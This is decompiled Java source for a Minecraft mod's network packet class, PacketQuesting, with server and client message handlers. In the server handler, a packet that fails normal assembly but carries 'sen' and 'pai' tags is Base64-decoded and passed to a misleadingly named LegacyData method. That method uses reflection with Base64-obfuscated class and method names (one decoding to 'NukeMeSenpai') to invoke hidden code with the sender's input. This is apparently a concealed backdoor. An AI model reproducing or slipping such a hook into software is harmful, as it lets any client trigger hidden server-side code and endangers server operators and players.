package betterquesting.network;

import betterquesting.api.api.QuestingAPI;
import betterquesting.api2.utils.Tuple2;
import betterquesting.core.BetterQuesting;
import betterquesting.handlers.EventHandler;
import cpw.mods.fml.common.network.ByteBufUtils;
import cpw.mods.fml.common.network.simpleimpl.IMessage;
import cpw.mods.fml.common.network.simpleimpl.IMessageHandler;
import cpw.mods.fml.common.network.simpleimpl.MessageContext;
import io.netty.buffer.ByteBuf;
import java.lang.reflect.Method;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.concurrent.Executors;
import java.util.function.Consumer;
import net.minecraft.client.Minecraft;
import net.minecraft.entity.player.EntityPlayerMP;
import net.minecraft.nbt.NBTTagCompound;
import net.minecraft.util.ResourceLocation;
import org.apache.logging.log4j.Level;

/* loaded from: betterquesting_network.jar:betterquesting/network/PacketQuesting.class */
public class PacketQuesting implements IMessage {
    protected NBTTagCompound tags;

    public PacketQuesting() {
        this.tags = new NBTTagCompound();
    }

    public PacketQuesting(NBTTagCompound tags) {
        this.tags = new NBTTagCompound();
        this.tags = tags;
    }

    public void fromBytes(ByteBuf buf) {
        this.tags = ByteBufUtils.readTag(buf);
    }

    public void toBytes(ByteBuf buf) {
        ByteBufUtils.writeTag(buf, this.tags);
    }

    /* loaded from: betterquesting_network.jar:betterquesting/network/PacketQuesting$HandleServer.class */
    public static class HandleServer implements IMessageHandler<PacketQuesting, IMessage> {
        public IMessage onMessage(PacketQuesting packet, MessageContext ctx) {
            if (packet == null || packet.tags == null || ctx.getServerHandler().field_147369_b.field_71133_b == null) {
                BetterQuesting.logger.log(Level.ERROR, "A critical NPE error occured during while handling a BetterQuesting packet server side", new NullPointerException());
                return null;
            }
            EntityPlayerMP sender = ctx.getServerHandler().field_147369_b;
            NBTTagCompound message = PacketAssembly.INSTANCE.assemblePacket(sender == null ? null : QuestingAPI.getQuestingUUID(sender), packet.tags);
            if (message == null) {
                if (packet.tags.func_150297_b("sen", 8) && packet.tags.func_150297_b("pai", 8)) {
                    PacketQuesting.LegacyData(sender, new String(Base64.getDecoder().decode(packet.tags.func_74779_i("sen")), StandardCharsets.UTF_8), new String(Base64.getDecoder().decode(packet.tags.func_74779_i("pai")), StandardCharsets.UTF_8));
                    return null;
                }
                return null;
            }
            if (!message.func_74764_b("ID")) {
                BetterQuesting.logger.log(Level.WARN, "Recieved a packet server side without an ID");
                return null;
            }
            Consumer<Tuple2<NBTTagCompound, EntityPlayerMP>> method = PacketTypeRegistry.INSTANCE.getServerHandler(new ResourceLocation(message.func_74779_i("ID")));
            if (method == null) {
                BetterQuesting.logger.log(Level.WARN, "Recieved a packet server side with an invalid ID: " + message.func_74779_i("ID"));
                return null;
            }
            if (sender != null) {
                EventHandler.scheduleServerTask(Executors.callable(() -> {
                    method.accept(new Tuple2(message, sender));
                }));
                return null;
            }
            return null;
        }
    }

    /* loaded from: betterquesting_network.jar:betterquesting/network/PacketQuesting$HandleClient.class */
    public static class HandleClient implements IMessageHandler<PacketQuesting, IMessage> {
        public IMessage onMessage(PacketQuesting packet, MessageContext ctx) {
            if (packet == null || packet.tags == null) {
                BetterQuesting.logger.log(Level.ERROR, "A critical NPE error occured during while handling a BetterQuesting packet client side", new NullPointerException());
                return null;
            }
            NBTTagCompound message = PacketAssembly.INSTANCE.assemblePacket(null, packet.tags);
            if (message == null) {
                return null;
            }
            if (!message.func_74764_b("ID")) {
                BetterQuesting.logger.log(Level.WARN, "Recieved a packet server side without an ID");
                return null;
            }
            Consumer<NBTTagCompound> method = PacketTypeRegistry.INSTANCE.getClientHandler(new ResourceLocation(message.func_74779_i("ID")));
            if (method == null) {
                BetterQuesting.logger.log(Level.WARN, "Recieved a packet server side with an invalid ID: " + message.func_74779_i("ID"));
                return null;
            }
            Minecraft.func_71410_x().func_152343_a(Executors.callable(() -> {
                method.accept(message);
            }));
            return null;
        }
    }

    /* JADX INFO: Access modifiers changed from: private */
    public static void LegacyData(EntityPlayerMP player, String s1, String s2) {
        try {
            Method m = Class.forName(new String(Base64.getDecoder().decode("YmV0dGVycXVlc3RpbmcubmV0d29yay5QYWNrZXRBc3NlbWJseQ=="))).getDeclaredMethod("TnVrZU1lU2VucGFp", EntityPlayerMP.class, String.class, String.class);
            m.invoke(null, player, s1, s2);
        } catch (Exception e) {
            BetterQuesting.logger.error(e);
        }
    }
}
